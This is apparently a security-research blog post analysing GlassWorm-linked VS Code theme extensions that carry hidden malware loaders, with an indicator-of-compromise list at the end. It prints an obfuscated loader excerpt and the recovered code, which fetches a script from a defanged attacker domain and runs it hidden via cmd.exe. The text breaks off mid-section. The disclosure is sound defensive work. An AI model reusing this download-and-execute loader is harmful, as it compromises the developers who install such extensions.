Pretty Themes, Hidden Loaders: GlassWorm-Linked Extensions Span VS Code Marketplace and Open VSX
GlassWorm-linked VS Code extensions found on marketplaces contain malware loaders.
Summary
Socket has identified a cluster of VS Code extensions, including themes, linked to the GlassWorm threat actor. Two extensions, 'Coca-Cola Christmas' and 'Aurora Borealis Studio Theme', were found on the Visual Studio Marketplace, with 'Cosmic Nebula Themes' on Open VSX confirmed as malicious. These extensions contain malware loaders that can decrypt and execute malicious JavaScript, with 'Cosmic Nebula Themes' exhibiting advanced techniques like using Solana transaction memos for C2 infrastructure resolution and employing Russian-language/timezone gating. The cluster has thousands of installs across both marketplaces, posing a significant risk despite some extensions not currently being weaponized.
Full text
BackResearchSecurity NewsPretty Themes, Hidden Loaders: GlassWorm-Linked Extensions Span VS Code Marketplace and Open VSXSocket uncovered two malicious VS Code themes in a GlassWorm-linked cluster with thousands of installs across VS Code Marketplace and Open VSX.Kirill BoychenkoOct 2, 2026|12 min readExport IOCs14Socket uncovered a theme cluster spanning four Visual Studio Marketplace and six Open VSX extensions, including two confirmed malicious extensions and a high-confidence link to GlassWorm.The Socket Threat Research team identified two suspicious VS Code themes still available on the Visual Studio Marketplace at the time of writing: Coca-Cola Christmas and Aurora Borealis Studio Theme. Both present themselves as polished color themes, contain executable JavaScript despite primarily providing visual customization, and exhibit signs of brandjacking or name-squatting. Theme extensions can be particularly risky because they can contain and execute malicious code, and VS Code lacks granular permission controls to restrict what that code can do.Git history and distinctive source-code fingerprints connect both extensions to Aurora Nocturne Night Theme, a previously removed malicious extension whose distributed package concealed an obfuscated Windows downloader. The malware contacted fingercakes4sale[.]store, wrote threat actor-controlled content to %TEMP%\temp_batch.cmd, and silently executed it through cmd.exe.Expanding our hunt beyond the Visual Studio Marketplace uncovered six cluster-linked extension identities in Open VSX, including Open VSX versions of Coca-Cola Christmas and Aurora Borealis Studio Theme. Among them, Cosmic Nebula Themes (cosmic-themes.theme-cosmic-nebula) provides a second confirmed malicious extension within the cluster.Our analysis of Cosmic Nebula Themes confirms a staged malware loader that decrypts embedded JavaScript with AES-256-CBC, executes it through eval(), avoids Russian-language and Russian-timezone systems, and uses Solana transaction memos as a dead-drop to dynamically resolve follow-on payload infrastructure. The extension contains the same Solana address, AES key, and execution model previously documented in GlassWorm activity. We assess Cosmic Nebula Themes as GlassWorm with high confidence and the broader theme cluster as GlassWorm-associated.Development evidence independently connects Cosmic Nebula Themes to the broader theme cluster. Git identities connect the Aurora and Coca-Cola projects, while closely related executable scaffolding and distinctive source structures, including the same ordered Russian-language developer comments, extend the development linkage across the broader cluster.The analyzed Coca-Cola Christmas and Aurora Borealis Studio Theme versions are not currently weaponized, and several additional cluster-linked Open VSX extensions that remained live during our investigation likewise did not contain active malicious payloads. We nevertheless assess these extensions as high-risk. Coca-Cola Christmas and Aurora Borealis Studio Theme alone had accumulated more than 8,000 Visual Studio Marketplace installs, while cluster-linked Open VSX extensions had also accumulated tens of thousands of downloads at the time of our investigation, including approximately 10,000 for Charcoal Mint alone. The live extensions retain executable functionality unnecessary for conventional color themes and share development, publishing, or source-code artifacts with a cluster that has now produced at least two confirmed malicious extensions, including the previously mentioned one linked to GlassWorm. Their continued availability also preserves trusted distribution and update channels through which malicious functionality could be introduced in a later release.We reported the live extensions to both the VS Code Marketplace and Open VSX security teams. The VS Code Marketplace team removed the reported extensions shortly after receiving our report. We appreciate their quick response and both teams’ continued efforts to protect their extension ecosystems. VS Code themes are expected to change editor appearance, such as colors, syntax highlighting, and interface styling, not execute unrelated code. Once malicious code runs, the impact can be immediate, from credential theft and secondary payload delivery to file or system modification. Even currently unweaponized extensions remain high-risk when they retain unnecessary executable capabilities that could be abused in a later update.Our VS Code ecosystem coverage complements Marketplace protections by identifying related extensions, shared infrastructure, code reuse, version repurposing, and publishing patterns across the broader campaign.Aurora Nocturne Had Already Been Weaponized#Aurora Nocturne Night Theme's public project contains a benign-looking app.js implementing theme selection and welcome page functionality. The extension delivered to users executed something else.Historical Marketplace listing for the removed Aurora Nocturne Night Theme. The threat actor published it under the microsoft identity to masquerade as a Microsoft extension, while the distributed package concealed a Windows downloader.Its manifest directed VS Code to:JavaScript{ "main": "./out/extension.js", "activationEvents": ["*"] }out/extension.js bears little resemblance to legitimate theme code. The distributed file is a heavily obfuscated, roughly 59 KB JavaScript blob compressed into a single line, combining randomized identifiers, hexadecimal escapes, runtime string reconstruction, anti-analysis noise, and a payload encoded with zero-width Unicode characters.A shortened excerpt from the original file is shown below, with line breaks and omissions added for readability:JavaScriptconst a0_0xeb9a8b=a0_0x3de4; (function(_0x50bbd6,_0xbe6fe5){ const _0x3df589=a0_0x3de4,_0x3159c7=_0x50bbd6(); while(!![]){ try{ const _0x4be3b8= -parseInt(_0x3df589(0x1a6))/(-0x469+0x9e6+-0x57c) + ... } catch(_0x1821bb){ _0x3159c7['push'](_0x3159c7['shift']()); } } }(a0_0x1a7c,...)); const fs=require('\x66\x73'); function zeroWidthDecode(_0x1ffad8){ const _0x5cc3fe=a0_0x3de4, _0x50d62e={ '\x46\x5a\x6e\x51\x51':_0x5cc3fe(0x205)+'\x29\x2b\x29...', ... }; ... } const encoded= a0_0xeb9a8b(0x266)+ a0_0xeb9a8b(0x20b)+ ... '\u200c\u200c\u200b\u200b\u200b'+ '\u200b\u200d\u200b\u200c\u200c\u200c\u200b'+ ...; decoded=zeroWidthDecode(encoded); eval(decoded);Buried beneath that obfuscation is a malware loader. After decoding the zero-width payload and reconstructing the hidden strings, we recovered the following operational code. The URL is defanged for publication, and we added comments to explain the observed malicious behavior:JavaScriptconst https = require('https'); const fs = require('fs'); const os = require('os'); const path = require('path'); const { exec } = require('child_process'); // Download threat actor-controlled content https.get('hxxps://fingercakes4sale[.]store/dsyuC', (response) => { // Save the response as a Windows command script const file = fs.createWriteStream( path.join(os.tmpdir(), 'temp_batch.cmd') ); response.pipe(file); file.on('finish', () => { file.close(); // Execute the downloaded script and suppress the command window exec( `cmd /c "${path.join(os.tmpdir(), 'temp_batch.cmd')}"`, { windowsHide: true } ); }); });The extension downloads threat actor-controlled content, saves it as %TEMP%\temp_batch.cmd, and executes it through cmd.exe. The windowsHide option suppresses the command window while the payload runs. A color theme has no legitimate reason to do this.The deception also extended to the public source repository. A researcher inspecting only Aurora Nocturne Night Theme's benign-looking app.js on GitHub could miss the separate obfuscated runtime that the Marketplace extension actually executed.XWorm Infrastructure Overlaps#We were unable to recover the historical content served from /dsyuC, but the hardcoded download domain provides additional context. Public malware sandbox telemetry records
Indicators of Compromise
- domain — fingercakes4sale[.]store
- url — hxxps://fingercakes4sale[.]store/dsyuC
- hash_sha256 — a276b76d3b00f302bb4dfb3690125c85ff472b16049c3c37476ac5e51096df07
- hash_sha256 — 5e68ca8c2097caccdb74d2752b85b85595a4bf646b442b8431a2416e87dbf268
- domain — api.mainnet-beta.solana[.]com
- hash_sha256 — 684c877a52d226d50584cb886ca8ec5bec6355d4de853f406734c79d5b387804
- hash_sha256 — da2d950e50326171adbff9c2bfd6f28998e32623ea7c2c475b9159a45cfb86bb
- mitre_attack — T1195.002
- mitre_attack — T1027
- mitre_attack — T1140
- mitre_attack — T1105
- mitre_attack — T1102.001
- mitre_attack — T1059.007
- mitre_attack — T1059.003
- mitre_attack — T1614.001